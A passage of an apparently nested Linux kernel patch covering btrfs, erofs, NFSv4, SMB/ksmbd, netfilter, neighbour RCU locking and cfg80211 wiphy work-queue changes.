+ 		ASSERT(old_dir_index >= BTRFS_DIR_START_INDEX);
+ 
++		ret = fscrypt_setup_filename(&old_dir->vfs_inode,
++					     &old_dentry->d_name, 0, &fname);
++		if (ret)
++			goto out;
+ 		/*
+ 		 * We have two inodes to update in the log, the old directory and
+ 		 * the inode that got renamed, so we must pin the log to prevent
+@@ -7508,13 +7491,17 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		 * not fail, but if it does, it's not serious, just bail out and
+ 		 * mark the log for a full commit.
+ 		 */
+-		if (WARN_ON_ONCE(ret < 0))
++		if (WARN_ON_ONCE(ret < 0)) {
++			fscrypt_free_filename(&fname);
+ 			goto out;
++		}
++
+ 		log_pinned = true;
+ 
+ 		path = btrfs_alloc_path();
+ 		if (!path) {
+ 			ret = -ENOMEM;
++			fscrypt_free_filename(&fname);
+ 			goto out;
+ 		}
+ 
+@@ -7530,8 +7517,7 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		 */
+ 		mutex_lock(&old_dir->log_mutex);
+ 		ret = del_logged_dentry(trans, log, path, btrfs_ino(old_dir),
+-					old_dentry->d_name.name,
+-					old_dentry->d_name.len, old_dir_index);
++					&fname.disk_name, old_dir_index);
+ 		if (ret > 0) {
+ 			/*
+ 			 * The dentry does not exist in the log, so record its
+@@ -7545,6 +7531,7 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		mutex_unlock(&old_dir->log_mutex);
+ 
+ 		btrfs_free_path(path);
++		fscrypt_free_filename(&fname);
+ 		if (ret < 0)
+ 			goto out;
+ 	}
+diff --git a/fs/btrfs/tree-log.h b/fs/btrfs/tree-log.h
+index bcca74128c3bb..8adebf4c9adaf 100644
+--- a/fs/btrfs/tree-log.h
++++ b/fs/btrfs/tree-log.h
+@@ -84,11 +84,11 @@ int btrfs_log_dentry_safe(struct btrfs_trans_handle *trans,
+ 			  struct btrfs_log_ctx *ctx);
+ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  struct btrfs_inode *dir, u64 index);
+ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 				struct btrfs_root *root,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_inode *inode, u64 dirid);
+ void btrfs_end_log_trans(struct btrfs_root *root);
+ void btrfs_pin_log_trans(struct btrfs_root *root);
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 5cd612a8f8584..49addc345aebe 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -217,9 +217,12 @@ again:
+ 			strm->buf.out_size = min_t(u32, outlen,
+ 						   PAGE_SIZE - pageofs);
+ 			outlen -= strm->buf.out_size;
+-			if (!rq->out[no] && rq->fillgaps)	/* deduped */
++			if (!rq->out[no] && rq->fillgaps) {	/* deduped */
+ 				rq->out[no] = erofs_allocpage(pagepool,
+ 						GFP_KERNEL | __GFP_NOFAIL);
++				set_page_private(rq->out[no],
++						 Z_EROFS_SHORTLIVED_PAGE);
++			}
+ 			if (rq->out[no])
+ 				strm->buf.out = kmap(rq->out[no]) + pageofs;
+ 			pageofs = 0;
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index be570c65ae154..e1297c6bcfbe2 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -7157,7 +7157,6 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ {
+ 	struct nfs4_lockdata *data = calldata;
+ 	struct nfs4_lock_state *lsp = data->lsp;
+-	struct nfs_server *server = NFS_SERVER(d_inode(data->ctx->dentry));
+ 
+ 	if (!nfs4_sequence_done(task, &data->res.seq_res))
+ 		return;
+@@ -7165,7 +7164,8 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 	data->rpc_status = task->tk_status;
+ 	switch (task->tk_status) {
+ 	case 0:
+-		renew_lease(server, data->timestamp);
++		renew_lease(NFS_SERVER(d_inode(data->ctx->dentry)),
++				data->timestamp);
+ 		if (data->arg.new_lock && !data->cancelled) {
+ 			data->fl.fl_flags &= ~(FL_SLEEP | FL_ACCESS);
+ 			if (locks_lock_inode_wait(lsp->ls_state->inode, &data->fl) < 0)
+@@ -7193,8 +7193,6 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 			if (!nfs4_stateid_match(&data->arg.open_stateid,
+ 						&lsp->ls_state->open_stateid))
+ 				goto out_restart;
+-			else if (nfs4_async_handle_error(task, server, lsp->ls_state, NULL) == -EAGAIN)
+-				goto out_restart;
+ 		} else if (!nfs4_stateid_match(&data->arg.lock_stateid,
+ 						&lsp->ls_stateid))
+ 				goto out_restart;
+@@ -10629,7 +10627,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	 */
+ 	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
+ 
+-	nfs4_schedule_state_manager(clp);
++	set_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state);
++	clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
++	wake_up_var(&clp->cl_state);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 5b49e5365bb30..457b2b2f804ab 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -1209,17 +1209,23 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ {
+ 	struct task_struct *task;
+ 	char buf[INET6_ADDRSTRLEN + sizeof("-manager") + 1];
+-	struct rpc_clnt *cl = clp->cl_rpcclient;
+-
+-	while (cl != cl->cl_parent)
+-		cl = cl->cl_parent;
++	struct rpc_clnt *clnt = clp->cl_rpcclient;
++	bool swapon = false;
+ 
+ 	set_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state);
+-	if (test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state) != 0) {
+-		wake_up_var(&clp->cl_state);
+-		return;
++
++	if (atomic_read(&clnt->cl_swapper)) {
++		swapon = !test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE,
++					   &clp->cl_state);
++		if (!swapon) {
++			wake_up_var(&clp->cl_state);
++			return;
++		}
+ 	}
+-	set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state);
++
++	if (test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state) != 0)
++		return;
++
+ 	__module_get(THIS_MODULE);
+ 	refcount_inc(&clp->cl_count);
+ 
+@@ -1236,8 +1242,9 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ 			__func__, PTR_ERR(task));
+ 		if (!nfs_client_init_is_complete(clp))
+ 			nfs_mark_client_ready(clp, PTR_ERR(task));
++		if (swapon)
++			clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs4_clear_state_manager_bit(clp);
+-		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs_put_client(clp);
+ 		module_put(THIS_MODULE);
+ 	}
+@@ -2703,6 +2710,13 @@ static void nfs4_state_manager(struct nfs_client *clp)
+ 		nfs4_end_drain_session(clp);
+ 		nfs4_clear_state_manager_bit(clp);
+ 
++		if (test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state) &&
++		    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING,
++				      &clp->cl_state)) {
++			memflags = memalloc_nofs_save();
++			continue;
++		}
++
+ 		if (!test_and_set_bit(NFS4CLNT_RECALL_RUNNING, &clp->cl_state)) {
+ 			if (test_and_clear_bit(NFS4CLNT_DELEGRETURN, &clp->cl_state)) {
+ 				nfs_client_return_marked_delegations(clp);
+@@ -2741,22 +2755,25 @@ static int nfs4_run_state_manager(void *ptr)
+ 
+ 	allow_signal(SIGKILL);
+ again:
+-	set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state);
+ 	nfs4_state_manager(clp);
+-	if (atomic_read(&cl->cl_swapper)) {
++
++	if (test_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state) &&
++	    !test_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state)) {
+ 		wait_var_event_interruptible(&clp->cl_state,
+ 					     test_bit(NFS4CLNT_RUN_MANAGER,
+ 						      &clp->cl_state));
+-		if (atomic_read(&cl->cl_swapper) &&
+-		    test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state))
++		if (!atomic_read(&cl->cl_swapper))
++			clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
++		if (refcount_read(&clp->cl_count) > 1 && !signalled() &&
++		    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state))
+ 			goto again;
+ 		/* Either no longer a swapper, or were signalled */
++		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 	}
+-	clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 
+ 	if (refcount_read(&clp->cl_count) > 1 && !signalled() &&
+ 	    test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state) &&
+-	    !test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state))
++	    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state))
+ 		goto again;
+ 
+ 	nfs_put_client(clp);
+diff --git a/fs/nfs/sysfs.c b/fs/nfs/sysfs.c
+index a6f7403669631..edb535a0ff973 100644
+--- a/fs/nfs/sysfs.c
++++ b/fs/nfs/sysfs.c
+@@ -18,7 +18,7 @@
+ #include "sysfs.h"
+ 
+ struct kobject *nfs_client_kobj;
+-static struct kset *nfs_client_kset;
++static struct kset *nfs_kset;
+ 
+ static void nfs_netns_object_release(struct kobject *kobj)
+ {
+@@ -55,13 +55,13 @@ static struct kobject *nfs_netns_object_alloc(const char *name,
+ 
+ int nfs_sysfs_init(void)
+ {
+-	nfs_client_kset = kset_create_and_add("nfs", NULL, fs_kobj);
+-	if (!nfs_client_kset)
++	nfs_kset = kset_create_and_add("nfs", NULL, fs_kobj);
++	if (!nfs_kset)
+ 		return -ENOMEM;
+-	nfs_client_kobj = nfs_netns_object_alloc("net", nfs_client_kset, NULL);
++	nfs_client_kobj = nfs_netns_object_alloc("net", nfs_kset, NULL);
+ 	if  (!nfs_client_kobj) {
+-		kset_unregister(nfs_client_kset);
+-		nfs_client_kset = NULL;
++		kset_unregister(nfs_kset);
++		nfs_kset = NULL;
+ 		return -ENOMEM;
+ 	}
+ 	return 0;
+@@ -70,7 +70,7 @@ int nfs_sysfs_init(void)
+ void nfs_sysfs_exit(void)
+ {
+ 	kobject_put(nfs_client_kobj);
+-	kset_unregister(nfs_client_kset);
++	kset_unregister(nfs_kset);
+ }
+ 
+ static ssize_t nfs_netns_identifier_show(struct kobject *kobj,
+@@ -159,7 +159,7 @@ static struct nfs_netns_client *nfs_netns_client_alloc(struct kobject *parent,
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (p) {
+ 		p->net = net;
+-		p->kobject.kset = nfs_client_kset;
++		p->kobject.kset = nfs_kset;
+ 		if (kobject_init_and_add(&p->kobject, &nfs_netns_client_type,
+ 					parent, "nfs_client") == 0)
+ 			return p;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 57da4f23c1e43..acb8951eb7576 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2901,9 +2901,9 @@ bind_socket(struct TCP_Server_Info *server)
+ 	if (server->srcaddr.ss_family != AF_UNSPEC) {
+ 		/* Bind to the specified local IP address */
+ 		struct socket *socket = server->ssocket;
+-		rc = socket->ops->bind(socket,
+-				       (struct sockaddr *) &server->srcaddr,
+-				       sizeof(server->srcaddr));
++		rc = kernel_bind(socket,
++				 (struct sockaddr *) &server->srcaddr,
++				 sizeof(server->srcaddr));
+ 		if (rc < 0) {
+ 			struct sockaddr_in *saddr4;
+ 			struct sockaddr_in6 *saddr6;
+@@ -3050,8 +3050,8 @@ generic_ip_connect(struct TCP_Server_Info *server)
+ 		 socket->sk->sk_sndbuf,
+ 		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
+ 
+-	rc = socket->ops->connect(socket, saddr, slen,
+-				  server->noblockcnt ? O_NONBLOCK : 0);
++	rc = kernel_connect(socket, saddr, slen,
++			    server->noblockcnt ? O_NONBLOCK : 0);
+ 	/*
+ 	 * When mounting SMB root file systems, we do not want to block in
+ 	 * connect. Otherwise bail out and then let cifs_reconnect() perform
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index e1d2be19cddfa..ff97cad8d5b45 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -84,6 +84,8 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
++	init_rwsem(&conn->session_lock);
++
+ 	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+ 	up_write(&conn_list_lock);
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index ad8dfaa48ffb3..335fdd714d595 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -50,6 +50,7 @@ struct ksmbd_conn {
+ 	struct nls_table		*local_nls;
+ 	struct unicode_map		*um;
+ 	struct list_head		conns_list;
++	struct rw_semaphore		session_lock;
+ 	/* smb session 1 per user */
+ 	struct xarray			sessions;
+ 	unsigned long			last_active;
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+index ea4b56d570fbb..cf6621e21ba36 100644
+--- a/fs/smb/server/mgmt/user_session.c
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -183,7 +183,7 @@ static void ksmbd_expire_session(struct ksmbd_conn *conn)
+ 	unsigned long id;
+ 	struct ksmbd_session *sess;
+ 
+-	down_write(&sessions_table_lock);
++	down_write(&conn->session_lock);
+ 	xa_for_each(&conn->sessions, id, sess) {
+ 		if (sess->state != SMB2_SESSION_VALID ||
+ 		    time_after(jiffies,
+@@ -194,7 +194,7 @@ static void ksmbd_expire_session(struct ksmbd_conn *conn)
+ 			continue;
+ 		}
+ 	}
+-	up_write(&sessions_table_lock);
++	up_write(&conn->session_lock);
+ }
+ 
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+@@ -236,7 +236,9 @@ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ 			}
+ 		}
+ 	}
++	up_write(&sessions_table_lock);
+ 
++	down_write(&conn->session_lock);
+ 	xa_for_each(&conn->sessions, id, sess) {
+ 		unsigned long chann_id;
+ 		struct channel *chann;
+@@ -253,7 +255,7 @@ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ 			ksmbd_session_destroy(sess);
+ 		}
+ 	}
+-	up_write(&sessions_table_lock);
++	up_write(&conn->session_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+@@ -261,9 +263,11 @@ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ {
+ 	struct ksmbd_session *sess;
+ 
++	down_read(&conn->session_lock);
+ 	sess = xa_load(&conn->sessions, id);
+ 	if (sess)
+ 		sess->last_active = jiffies;
++	up_read(&conn->session_lock);
+ 	return sess;
+ }
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index f6fd5cf976a50..683152007566c 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -8128,10 +8128,10 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 		goto err_out;
+ 	}
+ 
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
+ 
+ 	rsp->StructureSize = cpu_to_le16(24);
+ 	rsp->OplockLevel = rsp_oplevel;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1ed2ec035e779..1fba826f0acef 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -1065,7 +1065,7 @@ static inline int bpf_trampoline_unlink_prog(struct bpf_tramp_link *link,
+ static inline struct bpf_trampoline *bpf_trampoline_get(u64 key,
+ 							struct bpf_attach_target_info *tgt_info)
+ {
+-	return ERR_PTR(-EOPNOTSUPP);
++	return NULL;
+ }
+ static inline void bpf_trampoline_put(struct bpf_trampoline *tr) {}
+ #define DEFINE_BPF_DISPATCHER(name)
+diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
+index 15d7529ac9534..9a44de45cc1f2 100644
+--- a/include/linux/ipv6.h
++++ b/include/linux/ipv6.h
+@@ -33,6 +33,7 @@ struct ipv6_devconf {
+ 	__s32		accept_ra_defrtr;
+ 	__u32		ra_defrtr_metric;
+ 	__s32		accept_ra_min_hop_limit;
++	__s32		accept_ra_min_lft;
+ 	__s32		accept_ra_pinfo;
+ 	__s32		ignore_routes_with_linkdown;
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index 104ec00823da8..eefb0948110ae 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1906,6 +1906,8 @@ static inline bool can_do_mlock(void) { return false; }
+ extern int user_shm_lock(size_t, struct ucounts *);
+ extern void user_shm_unlock(size_t, struct ucounts *);
+ 
++struct folio *vm_normal_folio(struct vm_area_struct *vma, unsigned long addr,
++			     pte_t pte);
+ struct page *vm_normal_page(struct vm_area_struct *vma, unsigned long addr,
+ 			     pte_t pte);
+ struct page *vm_normal_page_pmd(struct vm_area_struct *vma, unsigned long addr,
+diff --git a/include/linux/netfilter/nf_conntrack_sctp.h b/include/linux/netfilter/nf_conntrack_sctp.h
+index 625f491b95de8..fb31312825ae5 100644
+--- a/include/linux/netfilter/nf_conntrack_sctp.h
++++ b/include/linux/netfilter/nf_conntrack_sctp.h
+@@ -9,6 +9,7 @@ struct ip_ct_sctp {
+ 	enum sctp_conntrack state;
+ 
+ 	__be32 vtag[IP_CT_DIR_MAX];
++	u8 init[IP_CT_DIR_MAX];
+ 	u8 last_dir;
+ 	u8 flags;
+ };
+diff --git a/include/linux/regulator/mt6358-regulator.h b/include/linux/regulator/mt6358-regulator.h
+index bdcf83cd719ef..be9f61e3e8e6d 100644
+--- a/include/linux/regulator/mt6358-regulator.h
++++ b/include/linux/regulator/mt6358-regulator.h
+@@ -48,8 +48,6 @@ enum {
+ 	MT6358_ID_VLDO28,
+ 	MT6358_ID_VAUD28,
+ 	MT6358_ID_VSIM2,
+-	MT6358_ID_VCORE_SSHUB,
+-	MT6358_ID_VSRAM_OTHERS_SSHUB,
+ 	MT6358_ID_RG_MAX,
+ };
+ 
+@@ -90,8 +88,6 @@ enum {
+ 	MT6366_ID_VMC,
+ 	MT6366_ID_VAUD28,
+ 	MT6366_ID_VSIM2,
+-	MT6366_ID_VCORE_SSHUB,
+-	MT6366_ID_VSRAM_OTHERS_SSHUB,
+ 	MT6366_ID_RG_MAX,
+ };
+ 
+diff --git a/include/net/arp.h b/include/net/arp.h
+index d7ef4ec71dfeb..e8747e0713c79 100644
+--- a/include/net/arp.h
++++ b/include/net/arp.h
+@@ -38,11 +38,11 @@ static inline struct neighbour *__ipv4_neigh_lookup(struct net_device *dev, u32
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv4_neigh_lookup_noref(dev, key);
+ 	if (n && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -51,10 +51,10 @@ static inline void __ipv4_confirm_neigh(struct net_device *dev, u32 key)
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv4_neigh_lookup_noref(dev, key);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ void arp_init(void);
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 5976545aa26b9..7a6c3059d50b5 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -5621,12 +5621,17 @@ struct cfg80211_cqm_config;
+  * wiphy_lock - lock the wiphy
+  * @wiphy: the wiphy to lock
+  *
+- * This is mostly exposed so it can be done around registering and
+- * unregistering netdevs that aren't created through cfg80211 calls,
+- * since that requires locking in cfg80211 when the notifiers is
+- * called, but that cannot differentiate which way it's called.
++ * This is needed around registering and unregistering netdevs that
++ * aren't created through cfg80211 calls, since that requires locking
++ * in cfg80211 when the notifiers is called, but that cannot
++ * differentiate which way it's called.
++ *
++ * It can also be used by drivers for their own purposes.
+  *
+  * When cfg80211 ops are called, the wiphy is already locked.
++ *
++ * Note that this makes sure that no workers that have been queued
++ * with wiphy_queue_work() are running.
+  */
+ static inline void wiphy_lock(struct wiphy *wiphy)
+ 	__acquires(&wiphy->mtx)
+@@ -5646,6 +5651,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy)
+ 	mutex_unlock(&wiphy->mtx);
+ }
+ 
++struct wiphy_work;
++typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *);
++
++struct wiphy_work {
++	struct list_head entry;
++	wiphy_work_func_t func;
++};
++
++static inline void wiphy_work_init(struct wiphy_work *work,
++				   wiphy_work_func_t func)
++{
++	INIT_LIST_HEAD(&work->entry);
++	work->func = func;
++}
++
++/**
++ * wiphy_work_queue - queue work for the wiphy
++ * @wiphy: the wiphy to queue for
++ * @work: the work item
++ *
++ * This is useful for work that must be done asynchronously, and work
++ * queued here has the special property that the wiphy mutex will be
++ * held as if wiphy_lock() was called, and that it cannot be running
++ * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can
++ * use just cancel_work() instead of cancel_work_sync(), it requires
++ * being in a section protected by wiphy_lock().
++ */
++void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work);
++
++/**
++ * wiphy_work_cancel - cancel previously queued work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to cancel
++ *
++ * Cancel the work *without* waiting for it, this assumes being
++ * called under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work);
++
++struct wiphy_delayed_work {
++	struct wiphy_work work;
++	struct wiphy *wiphy;
++	struct timer_list timer;
++};
++
++void wiphy_delayed_work_timer(struct timer_list *t);
++
++static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork,
++					   wiphy_work_func_t func)
++{
++	timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0);
++	wiphy_work_init(&dwork->work, func);
++}
++
++/**
++ * wiphy_delayed_work_queue - queue delayed work for the wiphy
++ * @wiphy: the wiphy to queue for
++ * @dwork: the delayable worker
++ * @delay: number of jiffies to wait before queueing
++ *
++ * This is useful for work that must be done asynchronously, and work
++ * queued here has the special property that the wiphy mutex will be
++ * held as if wiphy_lock() was called, and that it cannot be running
++ * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can
++ * use just cancel_work() instead of cancel_work_sync(), it requires
++ * being in a section protected by wiphy_lock().
++ */
++void wiphy_delayed_work_queue(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork,
++			      unsigned long delay);
++
++/**
++ * wiphy_delayed_work_cancel - cancel previously queued delayed work
++ * @wiphy: the wiphy, for debug purposes
++ * @dwork: the delayed work to cancel
++ *
++ * Cancel the work *without* waiting for it, this assumes being
++ * called under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_delayed_work_cancel(struct wiphy *wiphy,
++			       struct wiphy_delayed_work *dwork);
++
+ /**
+  * struct wireless_dev - wireless device state
+  *
+@@ -5718,6 +5805,7 @@ static inline void wiphy_unlock(struct wiphy *wiphy)
+  * @event_lock: (private) lock for event list
+  * @owner_nlportid: (private) owner socket port ID
+  * @nl_owner_dead: (private) owner socket went away
++ * @cqm_rssi_work: (private) CQM RSSI reporting work
+  * @cqm_config: (private) nl80211 RSSI monitor state
+  * @pmsr_list: (private) peer measurement requests
+  * @pmsr_lock: (private) peer measurements requests/results lock
+@@ -5790,7 +5878,8 @@ struct wireless_dev {
+ 	} wext;
+ #endif
+ 
+-	struct cfg80211_cqm_config *cqm_config;
++	struct wiphy_work cqm_rssi_work;
++	struct cfg80211_cqm_config __rcu *cqm_config;
+ 
+ 	struct list_head pmsr_list;
+ 	spinlock_t pmsr_lock;
+diff --git a/include/net/ndisc.h b/include/net/ndisc.h
+index da7eec8669ec4..325a6fb65c896 100644
+--- a/include/net/ndisc.h
++++ b/include/net/ndisc.h
+@@ -395,11 +395,11 @@ static inline struct neighbour *__ipv6_neigh_lookup(struct net_device *dev, cons
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(dev, pkey);
+ 	if (n && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -409,10 +409,10 @@ static inline void __ipv6_confirm_neigh(struct net_device *dev,
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(dev, pkey);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ static inline void __ipv6_confirm_neigh_stub(struct net_device *dev,
+@@ -420,10 +420,10 @@ static inline void __ipv6_confirm_neigh_stub(struct net_device *dev,
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref_stub(dev, pkey);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ /* uses ipv6_stub and is meant for use outside of IPv6 core */
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 794e45981891a..ccc4a0f8b4ad8 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -299,14 +299,14 @@ static inline struct neighbour *___neigh_lookup_noref(
+ 	const void *pkey,
+ 	struct net_device *dev)
+ {
+-	struct neigh_hash_table *nht = rcu_dereference_bh(tbl->nht);
++	struct neigh_hash_table *nht = rcu_dereference(tbl->nht);
+ 	struct neighbour *n;
+ 	u32 hash_val;
+ 
+ 	hash_val = hash(pkey, dev, nht->hash_rnd) >> (32 - nht->hash_shift);
+-	for (n = rcu_dereference_bh(nht->hash_buckets[hash_val]);
++	for (n = rcu_dereference(nht->hash_buckets[hash_val]);
+ 	     n != NULL;
+-	     n = rcu_dereference_bh(n->next)) {
++	     n = rcu_dereference(n->next)) {
+ 		if (n->dev == dev && key_eq(n, pkey))
+ 			return n;
+ 	}
+@@ -464,7 +464,7 @@ static __always_inline int neigh_event_send_probe(struct neighbour *neigh,
+ 
+ 	if (READ_ONCE(neigh->used) != now)
+ 		WRITE_ONCE(neigh->used, now);
+-	if (!(neigh->nud_state & (NUD_CONNECTED | NUD_DELAY | NUD_PROBE)))
++	if (!(READ_ONCE(neigh->nud_state) & (NUD_CONNECTED | NUD_DELAY | NUD_PROBE)))
+ 		return __neigh_event_send(neigh, skb, immediate_ok);
+ 	return 0;
+ }
+@@ -541,7 +541,7 @@ static inline int neigh_output(struct neighbour *n, struct sk_buff *skb,
+ 	    READ_ONCE(hh->hh_len))
+ 		return neigh_hh_output(hh, skb);
+ 
+-	return n->output(n, skb);
++	return READ_ONCE(n->output)(n, skb);
+ }
+ 
+ static inline struct neighbour *
+diff --git a/include/net/netlink.h b/include/net/netlink.h
+index 6bfa972f2fbf2..a686c9041ddc0 100644
+--- a/include/net/netlink.h
++++ b/include/net/netlink.h
+@@ -937,6 +937,27 @@ static inline struct nlmsghdr *nlmsg_put(struct sk_buff *skb, u32 portid, u32 se
+ 	return __nlmsg_put(skb, portid, seq, type, payload, flags);
+ }
+ 
++/**
++ * nlmsg_append - Add more data to a nlmsg in a skb
++ * @skb: socket buffer to store message in
++ * @size: length of message payload
++ *
++ * Append data to an existing nlmsg, used when constructing a message
++ * with multiple fixed-format headers (which is rare).
++ * Returns NULL if the tailroom of the skb is insufficient to store
++ * the extra payload.
++ */
++static inline void *nlmsg_append(struct sk_buff *skb, u32 size)
++{
++	if (unlikely(skb_tailroom(skb) < NLMSG_ALIGN(size)))
++		return NULL;
++
++	if (NLMSG_ALIGN(size) - size)
++		memset(skb_tail_pointer(skb) + size, 0,
++		       NLMSG_ALIGN(size) - size);
++	return __skb_put(skb, NLMSG_ALIGN(size));
++}
++
+ /**
+  * nlmsg_put_answer - Add a new callback based netlink message to an skb
+  * @skb: socket buffer to store message in
+diff --git a/include/net/nexthop.h b/include/net/nexthop.h
+index 28085b995ddcf..2b12725de9c09 100644
+--- a/include/net/nexthop.h
++++ b/include/net/nexthop.h
+@@ -497,29 +497,6 @@ static inline struct fib6_nh *nexthop_fib6_nh(struct nexthop *nh)
+ 	return NULL;
+ }
+ 
+-/* Variant of nexthop_fib6_nh().
+- * Caller should either hold rcu_read_lock_bh(), or RTNL.
+- */
+-static inline struct fib6_nh *nexthop_fib6_nh_bh(struct nexthop *nh)
+-{
